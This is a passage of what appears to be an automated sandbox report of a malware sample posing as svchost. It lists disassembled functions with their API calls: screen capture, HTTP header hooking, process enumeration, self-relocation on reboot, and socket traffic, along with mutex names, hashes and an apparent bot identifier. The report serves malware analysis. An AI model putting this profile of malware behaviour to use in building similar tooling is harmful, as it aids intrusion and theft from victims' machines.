GetHandleInformation.KERNEL32(00000000,00000000,?,?,02C78DCA,?,?,?,?,02C78F99,00000000,?,?,?,?,02C78500), ref: 02C7C93C
CloseHandle.KERNEL32(00000000,?,?,02C78DCA,?,?,?,?,02C78F99,00000000,?,?,?,?,02C78500,?), ref: 02C7C94D
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,02C78DCA,?,?,?,?,02C78F99,00000000,?,?,?,?,02C78500), ref: 02C7C95C
ReleaseMutex.KERNEL32(00000000), ref: 02C7C990
IsWindow.USER32(?), ref: 02C7C997
PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02C7C9AB

Strings

P0#v, xrefs: 02C7C990

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$CloseCreateInformationMessageMutexObjectPostReleaseSingleThreadWaitWindow
String ID: P0#v
API String ID: 731183410-3387790918
Opcode ID: 898a5462f15b66eb5b6a881246f3b77817fdb00d5b63b46bcc56904acff011f1
Instruction ID: dc847c986a7579aa9beb734f0ddc6753ee581b3efceb7b23b13afb8658165d64
Opcode Fuzzy Hash: 898a5462f15b66eb5b6a881246f3b77817fdb00d5b63b46bcc56904acff011f1
Instruction Fuzzy Hash: AE11C830E81315BBE7129F60EC0EF9A3BA8AF45714F1447A5FA149B2C1D7B46710CB94

Function 02C729B0 Relevance: 13.7, APIs: 9, Instructions: 198COMMON

Download Yara Rule

APIs

calloc.MSVCRT ref: 02C729C7
exit.MSVCRT ref: 02C729D5
calloc.MSVCRT ref: 02C729DE
exit.MSVCRT ref: 02C729EC
calloc.MSVCRT ref: 02C729F5
exit.MSVCRT ref: 02C72A02
free.MSVCRT ref: 02C72B51
free.MSVCRT ref: 02C72B79
free.MSVCRT ref: 02C72B95

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: callocexitfree
String ID:
API String ID: 3367576030-0
Opcode ID: bbcff4de4a4894e0a6d107a95d912f7d4d6b507eb13154987a22060052d57127
Instruction ID: 9e9d0ca8c05ed3c8b7aa55220ca6670d6b8bda956e2584675a14374352471800
Opcode Fuzzy Hash: bbcff4de4a4894e0a6d107a95d912f7d4d6b507eb13154987a22060052d57127
Instruction Fuzzy Hash: 1961A475A00609AFEB20DF69C880BAEB7B5FF88314F148459ED0697340D771EA51CF92

Function 02C9C140 Relevance: 13.7, APIs: 9, Instructions: 191fileCOMMON

Download Yara Rule

APIs

select.WS2_32(?,00000000,?,00000000,?), ref: 02C9C1C1
malloc.MSVCRT ref: 02C9C1DA
malloc.MSVCRT ref: 02C9C1EA
free.MSVCRT ref: 02C9C1F9
ReadFile.KERNEL32(?,00000000,00002000,?,00000000), ref: 02C9C225
CloseHandle.KERNEL32(?,?,00000000,00000000), ref: 02C9C307
free.MSVCRT ref: 02C9C326
free.MSVCRT ref: 02C9C343
free.MSVCRT ref: 02C9C349

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: free$malloc$CloseFileHandleReadselect
String ID:
API String ID: 158848325-0
Opcode ID: fe96fb7445081e0d6b7b4217289d3908891c8ab8d549666e3766b5898d1a3772
Instruction ID: 700ab6dcdf6e10d77520856caff018f3a20b3bd56e95b8683181c0d6a86973f5
Opcode Fuzzy Hash: fe96fb7445081e0d6b7b4217289d3908891c8ab8d549666e3766b5898d1a3772
Instruction Fuzzy Hash: 2351C771D00659ABDB10CFA99C88BFFB7F8EB88724F14056AE51DD7280D631AB018B91

Function 004011C0 Relevance: 13.6, APIs: 9, Instructions: 66fileCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(00401C30,?,0000001C), ref: 004011EF
GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 00401205
PathFileExistsA.SHLWAPI(?), ref: 00401212
GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401229
GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 00401241
MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040125D
SetFileAttributesA.KERNEL32(?,00000000), ref: 0040126C
DeleteFileA.KERNEL32(?), ref: 00401279
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040128D

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
String ID:
API String ID: 2787354276-0
Opcode ID: 13bd0b2ba2dd39b79c74d8f201215cd59729224600901bedf3da6c7ccc4d33b0
Instruction ID: 6fb89bbc187d80a5bc5b9bf27070627c8da11026cf83192134f00bca91ba5049
Opcode Fuzzy Hash: 13bd0b2ba2dd39b79c74d8f201215cd59729224600901bedf3da6c7ccc4d33b0
Instruction Fuzzy Hash: 7C21FCB1900219AFDB50DBA0DD49FEA77BCAB48700F4045A9E705F6190E7B49A54CFA4

Function 00402ED0 Relevance: 13.5, APIs: 9, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 00402ED7
GetProcessHeap.KERNEL32(00000000,00000300,004035BE,7644E610,00402EBE), ref: 00402EEF
HeapValidate.KERNEL32(00000000), ref: 00402EF2
GetProcessHeap.KERNEL32(00000000,00000300), ref: 00402EFF
HeapFree.KERNEL32(00000000), ref: 00402F02
GetProcessHeap.KERNEL32(00000000,004035BE,004035BE,7644E610,00402EBE), ref: 00402F0B
HeapValidate.KERNEL32(00000000), ref: 00402F0E
GetProcessHeap.KERNEL32(00000000,004035BE), ref: 00402F1B
HeapFree.KERNEL32(00000000), ref: 00402F1E

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Validate$String
String ID:
API String ID: 2629017576-0
Opcode ID: fff050803a28cdbdb81a85633d3b81f0a42b3d859f4e64ff46b7961ccc31fb95
Instruction ID: 47c24e4de567f4ebe007c7ce519db5101e5d5be497eca443f574c4ff2f4d9865
Opcode Fuzzy Hash: fff050803a28cdbdb81a85633d3b81f0a42b3d859f4e64ff46b7961ccc31fb95
Instruction Fuzzy Hash: 8BF0DAB1656211ABEA102BA59E8CF572A6CEF85B82F040525B708F71D0CAB4DC40D67C

Function 02C98890 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 226timeCOMMON

Download Yara Rule

APIs

Part of subcall function 02C9EAA0: select.WS2_32(?,?,00000000,00000000,?), ref: 02C9EB27
Part of subcall function 02C9EAA0: __WSAFDIsSet.WS2_32(?,?), ref: 02C9EB58
Part of subcall function 02C9EAA0: recv.WS2_32(?,?,00000005,00000000), ref: 02C9EB7B
Part of subcall function 02C9EAA0: recv.WS2_32(?,?,00000004,00000000), ref: 02C9EB9D
Part of subcall function 02C9EAA0: socket.WS2_32(00000002,00000001,00000000), ref: 02C9EBB6
Part of subcall function 02C9EAA0: setsockopt.WS2_32(00000000,00000006,00000001,00000001,00000004), ref: 02C9EBD2

malloc.MSVCRT ref: 02C988B3
GetSystemTime.KERNEL32(?), ref: 02C98987
GetSystemTime.KERNEL32(?), ref: 02C989D2
GetSystemTime.KERNEL32(00000000,?), ref: 02C98A64
GetSystemTime.KERNEL32(user!899552!E7E3D226,?), ref: 02C98AB2
free.MSVCRT ref: 02C98B6F

Strings

user!899552!E7E3D226, xrefs: 02C98AB1

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: SystemTime$recv$freemallocselectsetsockoptsocket
String ID: user!899552!E7E3D226
API String ID: 2153857484-1289176755
Opcode ID: 49f1d266871a2e713ea10d1f790a0fcbf5d4a49dcbe9e1e26214910ee85b388a
Instruction ID: c92b1d76400ef9843e2e8b4eed5cff5ffa8c5a4895de51623a914c03a3318989
Opcode Fuzzy Hash: 49f1d266871a2e713ea10d1f790a0fcbf5d4a49dcbe9e1e26214910ee85b388a
Instruction Fuzzy Hash: 8C91BF71A006558FDF28CF28C4987BEBBE5BB86304F04476EE5969B681E734E681CB50

Function 02C899D0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 98libraryloaderCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C899E7
GetVersionExW.KERNEL32(?), ref: 02C89A0A
GetModuleHandleA.KERNEL32(kernel32.dll), ref: 02C89ADB
GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 02C89AEC
GetCurrentProcess.KERNEL32(00000000), ref: 02C89AFC

Strings

kernel32.dll, xrefs: 02C89AC9
IsWow64Process, xrefs: 02C89AE6

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: AddressCurrentHandleModuleProcProcessVersionmemset
String ID: IsWow64Process$kernel32.dll
API String ID: 877405840-3024904723
Opcode ID: 2d8e0a6a8fff08f23e0aad92f46895f996e6a680ca94b2f21621046ed013eb6d
Instruction ID: ab2509dac45ebc24982450debd88eb51baa31cac6808634e6fc844e1ce05eae6
Opcode Fuzzy Hash: 2d8e0a6a8fff08f23e0aad92f46895f996e6a680ca94b2f21621046ed013eb6d
Instruction Fuzzy Hash: 9F316B30A80119ABDF39EE55C895BF973B9EF4630CF5085A9D50697340EB719B90CA81

Function 02C77890 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90synchronizationCOMMON

Download Yara Rule

APIs

GdiFlush.GDI32(?,?,?), ref: 02C77926
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C77934
IsBadWritePtr.KERNEL32(?,?), ref: 02C7794A
IsBadReadPtr.KERNEL32(00000000,?), ref: 02C77956
memcpy.MSVCRT(?,00000000,?), ref: 02C77963
ReleaseMutex.KERNEL32(00000000), ref: 02C77985

Strings

P0#v, xrefs: 02C77985

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: FlushMutexObjectReadReleaseSingleWaitWritememcpy
String ID: P0#v
API String ID: 3485819771-3387790918
Opcode ID: 8171cd07da8917a43439a99d2a7210e13dec6fc51a1ddb171d100cc1c6730262
Instruction ID: 724dfa19468e913fa4ed040b0bc688f067e8746fae3b6580ec2c130846e12548
Opcode Fuzzy Hash: 8171cd07da8917a43439a99d2a7210e13dec6fc51a1ddb171d100cc1c6730262
Instruction Fuzzy Hash: AE31CA32E411099BCB15CF69D984BAABBB5EFC8354F2885A9EC04D7305D730E955CB90

Function 02C7AB21 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02C7AB2F
IsWindow.USER32(?), ref: 02C7AB54
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7AB62
ReleaseMutex.KERNEL32 ref: 02C7AB97
IsWindow.USER32(?), ref: 02C7AB9E
SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C7ABAE

Strings

P0#v, xrefs: 02C7AB97

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Window$CurrentMessageMutexObjectReleaseSendSingleThreadWait
String ID: P0#v
API String ID: 1675675969-3387790918
Opcode ID: d5d136a4041b7d436f771182aacef41972af81b25510e3df2a3fb617409e179f
Instruction ID: 03f074cc63b41d1f3aab212351704ecd20f5acd8214eb696ac11eda72c1c52d8
Opcode Fuzzy Hash: d5d136a4041b7d436f771182aacef41972af81b25510e3df2a3fb617409e179f
Instruction Fuzzy Hash: 35012431A81250AFCB029B24FC08FDE33A4BF84724F050BF5E8448B282D7B5A9428BC0

Function 02C7A9A0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 37synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 02C7A9AD
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7A9CB
ReleaseMutex.KERNEL32 ref: 02C7AA00
IsWindow.USER32(?), ref: 02C7AA07
SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02C7AA1B
SetLastError.KERNEL32(00000005), ref: 02C7AA2A

Strings

P0#v, xrefs: 02C7AA00

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: CurrentErrorLastMessageMutexObjectReleaseSendSingleThreadWaitWindow
String ID: P0#v
API String ID: 699575883-3387790918
Opcode ID: b27bce4fcbca707674da6cca9773a2ca59ec8251dd11a3a9c0c98df92576ddb6
Instruction ID: b57c32ef7cd3355056b50e60d3a575415a9a353647a6e2fe4b6cb4813c133737
Opcode Fuzzy Hash: b27bce4fcbca707674da6cca9773a2ca59ec8251dd11a3a9c0c98df92576ddb6
Instruction Fuzzy Hash: 75014B349C0240AFE7169B20E84DBDA37A4FB98716F054BA8F5198B2D1CBB556A1CF90

Function 02C90280 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 31synchronizationsleepCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02C9028E
Sleep.KERNEL32(000003E8), ref: 02C9029F
ReleaseMutex.KERNEL32(00000000), ref: 02C902A6
GetHandleInformation.KERNEL32(00000000,?), ref: 02C902B8
CloseHandle.KERNEL32(00000000), ref: 02C902C9

Strings

Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}, xrefs: 02C90285
P0#v, xrefs: 02C902A6

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutex$CloseCreateInformationReleaseSleep
String ID: Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0#v
API String ID: 1893094850-2586879793
Opcode ID: f06f6f68b692b4df80c7d7f822048cac3a6d39cf8352ce90042cfbb9e9ac5f45
Instruction ID: 7b5619f72061de97dfb8ba50d1b1332e428a752ab455fde5046a9974113a088f
Opcode Fuzzy Hash: f06f6f68b692b4df80c7d7f822048cac3a6d39cf8352ce90042cfbb9e9ac5f45
Instruction Fuzzy Hash: 6DF0A730D826A4B7E7125BA09C0DBAE7A9CDF45B15F0046C0F805D3181D7B0861046A1

Function 02C8A390 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 30synchronizationsleepCOMMON

Download Yara Rule

APIs

CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 02C8A39E
Sleep.KERNEL32(000003E8), ref: 02C8A3AF
ReleaseMutex.KERNEL32(00000000), ref: 02C8A3B6
GetHandleInformation.KERNEL32(00000000,?), ref: 02C8A3C8
CloseHandle.KERNEL32(00000000), ref: 02C8A3D9

Strings

Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}, xrefs: 02C8A395
P0#v, xrefs: 02C8A3B6

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutex$CloseCreateInformationReleaseSleep
String ID: Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}$P0#v
API String ID: 1893094850-253269245
Opcode ID: a5663edb95a2c72d152053f0210cd614263555c4a7ddfa9d3fc34966fc3c5894
Instruction ID: 4841972f98751e0d98693809ac7c433629e7ee9a812505941e5fca44fe9b3815
Opcode Fuzzy Hash: a5663edb95a2c72d152053f0210cd614263555c4a7ddfa9d3fc34966fc3c5894
Instruction Fuzzy Hash: F8F0EC31D81294F7E7125B94DC0DB9E7B5CDF0570AF004281FD0993180E7F08E1487A1

Function 02C7BB10 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(02C7C29D), ref: 02C7BB2F
GetWindowInfo.USER32(02C7C29D,?), ref: 02C7BB49
GetClassLongA.USER32(02C7C29D,000000E6), ref: 02C7BB9E
PrintWindow.USER32(02C7C29D,?,00000000), ref: 02C7BBB7
BitBlt.GDI32(02C7BD82,?,?,?,?,7694BCB0,00000000,00000000,00CC0020), ref: 02C7BC5E

Part of subcall function 02C7CC80: GetClassNameA.USER32(?,?,00000101), ref: 02C7CC96

Part of subcall function 02C7B950: SendMessageA.USER32(?,?,00000004,00000000), ref: 02C7B978
Part of subcall function 02C7B950: GdiFlush.GDI32(00000000,?,762330D0,?,?,?,02C7843E), ref: 02C7B98E
Part of subcall function 02C7B950: BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 02C7B9B4

Strings

<, xrefs: 02C7BB42

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Window$Class$FlushInfoLongMessageNamePrintSendVisible
String ID: <
API String ID: 2334662925-4251816714
Opcode ID: e4894afa2bf716a42caf37b7b11bc8e27eb5ceb2ea965b2bbc33eb65ace83cf7
Instruction ID: 093ccc57ffc1fd99d080eff7a680f8aef94a22716c52aaadbc85895ac9ea315c
Opcode Fuzzy Hash: e4894afa2bf716a42caf37b7b11bc8e27eb5ceb2ea965b2bbc33eb65ace83cf7
Instruction Fuzzy Hash: 08413C71E00519AFCB15CF58C985AAEFBBABF84308F148259E405A7644DB30BE52CB90

Function 02C7FBA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104networkCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7FBD3
VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7FBFF
VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7FC26
HttpAddRequestHeadersW.WININET(?,?,?,A0000000), ref: 02C7FC6C
HttpAddRequestHeadersA.WININET(?,Accept-Encoding:,00000012,A0000000), ref: 02C7FC7F

Strings

Accept-Encoding:, xrefs: 02C7FC79

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$HeadersHttpRequest
String ID: Accept-Encoding:
API String ID: 853579731-3444961765
Opcode ID: eae1558d97f0c1907df676c8d2acc288414731bcd5932755705afb8cacad6815
Instruction ID: a1939f19b0903ae485086d7e66a7c0367de7593c3fc979b1ec14221293d3a2c0
Opcode Fuzzy Hash: eae1558d97f0c1907df676c8d2acc288414731bcd5932755705afb8cacad6815
Instruction Fuzzy Hash: 9F31FFB1D4121DAFDB50DFA5D885AEEBBB9FF88310F114569ED15E7200D3749A018FA0

Function 02C7ABD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92stringCOMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7AC0F
VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7AC3B
VirtualQuery.KERNEL32(Function_00023910,?,0000001C), ref: 02C7AC62
GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 02C7AC91
lstrcmpiA.KERNEL32(?,7d2de3ada), ref: 02C7ACA7

Strings

7d2de3ada, xrefs: 02C7AC9B

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: QueryVirtual$InformationObjectUserlstrcmpi
String ID: 7d2de3ada
API String ID: 410342393-2501648331
Opcode ID: 35ea4937242a902a5c5d0cf1d59a717b5ec3b164cb4c847174ea150e8905d255
Instruction ID: 50cd088300e2c098ad6a19424ca14a86222806e7c165223fdedc0b517644ca9f
Opcode Fuzzy Hash: 35ea4937242a902a5c5d0cf1d59a717b5ec3b164cb4c847174ea150e8905d255
Instruction Fuzzy Hash: 7C31E1B1E40209EFDB40CFA9D885AEEBBF9FB48300F10856AE514E7240E7755A40CF90

Function 02C8A9D6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79threadCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(82C3184B), ref: 02C8A9F7
CreateThread.KERNEL32(00000000,00000000,02C8B260,02CC7DA0,00000000,00000000), ref: 02C8AA90
GetHandleInformation.KERNEL32(00000000,?), ref: 02C8AAA8
CloseHandle.KERNEL32(00000000), ref: 02C8AAB9

Strings

keys, xrefs: 02C8AA3B
82C3184B, xrefs: 02C8A9F2, 02C8A9FD

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$BackslashCloseCreateInformationPathThread
String ID: 82C3184B$keys
API String ID: 3186380484-3056022213
Opcode ID: 2771d991d4f445e0f8a9d88fa8f6d17c7ff2f7c90c2fbd5c1e4154789060f2d3
Instruction ID: 31663a969f21679a839c96e740fe0cc2cd9ff88a966b516aecd0452d6e46079d
Opcode Fuzzy Hash: 2771d991d4f445e0f8a9d88fa8f6d17c7ff2f7c90c2fbd5c1e4154789060f2d3
Instruction Fuzzy Hash: AE214D319851455BDB22DB7499187FEB7E4DF49308F2881D9E845E7240EB71CE09CF90

Function 004014B0 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004014D4
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?,76D6DB30), ref: 004014DF
Process32First.KERNEL32 ref: 00401505
StrStrIA.SHLWAPI(?,?), ref: 00401520
Process32Next.KERNEL32(00000000,?), ref: 0040152C
GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401548
CloseHandle.KERNEL32(00000000), ref: 0040155A

Memory Dump Source

Source File: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3375821338.000000000045B000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
String ID:
API String ID: 3955875343-0
Opcode ID: 7873ba4b88183a8641433f701d7857d9c97be643caff6c6a3dfa6b6ea5f2b523
Instruction ID: 35ff206d6e877699644ac5607af1a2cdaefe1b2aeb9dd15ae369335d4f3073ea
Opcode Fuzzy Hash: 7873ba4b88183a8641433f701d7857d9c97be643caff6c6a3dfa6b6ea5f2b523
Instruction Fuzzy Hash: 1D11C3B25042146BD310DF65DC0899BBBACEBD53A0F00453AFE55A72D0E33499088BEA

Function 02C93170 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02C93194
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C9319F
Process32First.KERNEL32 ref: 02C931C5
StrStrIA.SHLWAPI(?,?), ref: 02C931E0
Process32Next.KERNEL32(00000000,?), ref: 02C931EC
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C93208
CloseHandle.KERNEL32(00000000), ref: 02C9321A

Memory Dump Source

Source File: 00000002.00000002.3391913803.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true

Associated: 00000002.00000002.3391913803.0000000002CC7000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3391913803.0000000002CCC000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd

Yara matches

Similarity

API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
String ID:
API String ID: 3955875343-0
Opcode ID: 810e14c39b12bc5e0f1888c9af17e2f18aa07edadceab16d62b3436b5ada740f
Instruction ID: 17a8724991fbeb8b365db2bb00f289a510eb225140cfe046ce7502c62d85ccaf
Opcode Fuzzy Hash: 810e14c39b12bc5e0f1888c9af17e2f18aa07edadceab16d62b3436b5ada740f
Instruction Fuzzy Hash: 9511D2729043916BC711DF65EC49A9BBBECEFC9360F008A59FD5483281E7309619CBE2

Function 00401000 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 63fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,00402B5B,00000000), ref: 0040102A
